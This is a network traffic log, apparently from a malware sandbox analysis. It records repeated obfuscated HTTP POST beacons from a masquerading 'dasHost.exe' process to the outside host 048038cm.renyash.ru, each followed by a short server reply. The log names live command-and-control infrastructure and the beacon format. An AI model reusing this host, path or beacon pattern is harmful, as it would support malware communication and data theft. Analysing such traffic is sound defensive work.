                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:45.230799913 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:45.579380989 CET | 2584 | OUT | Data Raw: 56 50 59 55 53 41 50 52 5d 5f 52 56 5a 5b 58 54 57 50 5f 51 54 52 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYUSAPR]_RVZ[XTWP_QTRU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'?<&6]?48-;+#.>^*P7<=<?9:#!<*%\ ![(+
                                                                        Dec 28, 2024 20:43:46.315700054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:46.586679935 CET | 815 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gM6Wr1SJkek342q1UPhFSF%2FPbYZ5rBfBDGJIOCQrsp%2FOVfthUwP%2FLF%2F1aQOF3q5ONI6IxaLCQc%2Buva875N2xAjo15DQgqkmYJKtUZ6YsMrwyX7ifnV%2FJsV%2BBU%2BhvAnlYDO6aG5SN"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a898c536a5f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7005&min_rtt=1770&rtt_var=11134&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=33447&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        38 | 192.168.2.4 | 49866 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:46.840744972 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:47.188683987 CET | 2584 | OUT | Data Raw: 53 55 59 55 56 48 50 5c 5d 5f 52 56 5a 5b 58 54 57 5c 5f 5f 54 5c 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SUYUVHP\]_RVZ[XTW\__T\U@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$)?1]!77;8+Z7>>>'7,=//.3]"#>%\ ![(+
                                                                        Dec 28, 2024 20:43:47.972851992 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:48.222664118 CET | 805 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofLbHxJk1OnAQqCEFHG5DgLwHLa6gVv7jf7fXio0WPCkd7UOn39%2BtwGf06P4p5WxGjqAYhJzs7r4Zobza03%2ByR7dS8l7pW8Tfr16oBmnNhc4AxLO%2FAIL1o41jU27I4S0FcdAVtD7"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a93eebe8c39-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3318&min_rtt=2080&rtt_var=3256&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=121818&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        39 | 192.168.2.4 | 49871 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:48.464011908 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:48.813771009 CET | 2584 | OUT | Data Raw: 53 56 5c 54 53 42 50 5e 5d 5f 52 56 5a 5f 58 5c 57 5c 5f 5e 54 56 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SV\TSBP^]_RVZ_X\W\_^TVUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$(?96 #%/;'\ ="Y>>04P(/;_::'["08><%\ ![(
                                                                        Dec 28, 2024 20:43:49.602549076 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:49.843803883 CET | 813 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2B3Z6xTc%2FeRAqgY%2Bd0w5Xi76tLCAV5UxAOtMIlbC2%2BCSxbMAFqyIhfb9Y2pqfcdhROrqUHSdrDlRrWUB3%2B8HzsEojHyTAeuK%2FGVgsnO6Fa5xDzDoBU8LaHiztG%2FK7DWJyT3E2y1R"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a9e187843cd-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8218&min_rtt=1755&rtt_var=13585&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=27308&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        40 | 192.168.2.4 | 49874 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:50.092655897 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:50.438827991 CET | 2584 | OUT | Data Raw: 56 57 59 54 56 45 50 52 5d 5f 52 56 5a 5f 58 5d 57 5f 5f 5b 54 54 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VWYTVEPR]_RVZ_X]W__[TTU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'(<>" ["5;#Z#-=><#V=3Y9)3X6 '[)%\ ![(
                                                                        Dec 28, 2024 20:43:51.226088047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:51.467955112 CET | 814 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZUlzEO%2BIJeDvBDkLqYf5rYp2jgeeacMQlOdLenbhbEQqxvGxxvJqyzvLEndEXiOdPaNE%2F2K%2F2p6JN7O9cROB1C1eFA0kRRJYIQs%2FrgxlT%2BlySB%2B7K%2Fg65k606eY8BUF%2Fkh0BARql"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940aa82c0a78dc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4045&min_rtt=1920&rtt_var=4970&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=77154&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        41 | 192.168.2.4 | 49879 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:51.751000881 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:52.110512972 CET | 2584 | OUT | Data Raw: 56 55 59 50 53 44 50 5c 5d 5f 52 56 5a 5d 58 54 57 50 5f 5b 54 54 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYPSDP\]_RVZ]XTWP_[TTUCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+Z"!;Z7%$_-8?Z!._= $><<."0?\=,%\ ![(3
                                                                        Dec 28, 2024 20:43:52.881959915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:53.125525951 CET | 808 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqECRCWXoX4O%2BnHn8k5FMm2EpSPIg%2FVCFweeJGui8sZJZVPmV4DDhdm5SDnD8ogoWarxs9NaPS96Q5SuxhOz1VT%2FEZanjHHeC54QnC%2BeCxGYfg2MBQYKe504omgsCCl%2BEUlPOGdu"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ab298bd8c1e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4817&min_rtt=1988&rtt_var=6405&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=59284&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        42 | 192.168.2.4 | 49885 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:53.371210098 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:53.719923973 CET | 2584 | OUT | Data Raw: 56 54 59 5f 56 45 55 59 5d 5f 52 56 5a 5b 58 59 57 50 5f 58 54 5c 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VTY_VEUY]_RVZ[XYWP_XT\UGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$[+2"+4[7<[-8 #&\=[?P#*8.*(##;[*<%\ ![(+
                                                                        Dec 28, 2024 20:43:54.892842054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:54.893074036 CET | 811 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qfUPFo0Unbg75aX20Nh92%2BdNhFtgl4G2%2Bc99G%2FwvMGn8jn769UmC0Qje2wOlT1yJIO8t3bzEvHmaI54WkfNcQxzlgVIqipyxL1xx8Nj8VOhgaPGnnWY4JU4S9dgE%2B%2Fx2R3SFDX2%2B"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940abcbe8141c1-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3541&min_rtt=2069&rtt_var=3721&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=105399&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0
                                                                        Dec 28, 2024 20:43:54.895816088 CET | 811 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qfUPFo0Unbg75aX20Nh92%2BdNhFtgl4G2%2Bc99G%2FwvMGn8jn769UmC0Qje2wOlT1yJIO8t3bzEvHmaI54WkfNcQxzlgVIqipyxL1xx8Nj8VOhgaPGnnWY4JU4S9dgE%2B%2Fx2R3SFDX2%2B"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940abcbe8141c1-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3541&min_rtt=2069&rtt_var=3721&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=105399&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        43 | 192.168.2.4 | 49887 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:55.152890921 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:55.501260042 CET | 2584 | OUT | Data Raw: 56 54 59 55 53 45 55 5e 5d 5f 52 56 5a 51 58 5c 57 5c 5f 5b 54 54 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VTYUSEU^]_RVZQX\W\_[TTUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X),[5(4"5,Y-+7]#.)-/"9/)/99+[6><%\ ![(
                                                                        Dec 28, 2024 20:43:56.282757044 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:56.523976088 CET | 811 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEN3Df86ZZe%2F5qa234tRuomSlIik%2BATTE0aemOfQkB%2F%2BTpTUBsiBifPwvM489XWewcGud8I4uVKj%2BzLKS0tkwZdnq7K9yUybuKG2il7aUetxtmA2Z3hIXyycC2QQE9230sSgSv2%2B"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ac7db8b5e78-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3159&min_rtt=1567&rtt_var=3772&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=102047&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        44 | 192.168.2.4 | 49892 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:56.770175934 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:57.126178026 CET | 2584 | OUT | Data Raw: 56 51 59 53 56 40 55 58 5d 5f 52 56 5a 59 58 58 57 51 5f 5e 54 52 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VQYSV@UX]_RVZYXXWQ_^TRU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$?68(Z#S',+7\7>Y=[< *4)?:_'" ;Z>%\ ![(#
                                                                        Dec 28, 2024 20:43:57.948057890 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:58.201148033 CET | 810 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:58 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ThUi9058%2B%2BK%2BWXuRN%2BDGnG0KLmi4RPt8dkSoNUBEJ0%2BatD%2Fmo2bKvNEZsPMZItdKvXyCqQln9tvzIAp4VeLa9hj9ppNHbsWnvws7qvHu6rIPsYuhhmxe2IqZID2Q4P9LGS53O3Sm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ad22fa642be-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4078&min_rtt=2463&rtt_var=4154&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=94891&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        45 | 192.168.2.4 | 49898 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:58.479480982 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:58.829238892 CET | 2584 | OUT | Data Raw: 56 5b 5c 55 56 49 50 5d 5d 5f 52 56 5a 5b 58 55 57 59 5f 5c 54 53 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[\UVIP]]_RVZ[XUWY_\TSUDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_+<\5+<^"%/3[!.>=+V#(*89)753?)<%\ ![(+
                                                                        Dec 28, 2024 20:43:59.613854885 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:59.856158018 CET | 807 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KVf91rsR%2BL3Mua2Zlpk3Im2jq3a%2FwgrOvp2upAs1rx76RcoxktKKP1QsSAuM0Ym5WTY7MFXoUpXxIDdzBvaMD%2BbvV1teBxbqgQgG6Gahvgk8lQDHbLUxDwt7MXME649%2BMnaRSviu"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940adc993a4239-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7909&min_rtt=1595&rtt_var=13226&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=28019&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        46 | 192.168.2.4 | 49904 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
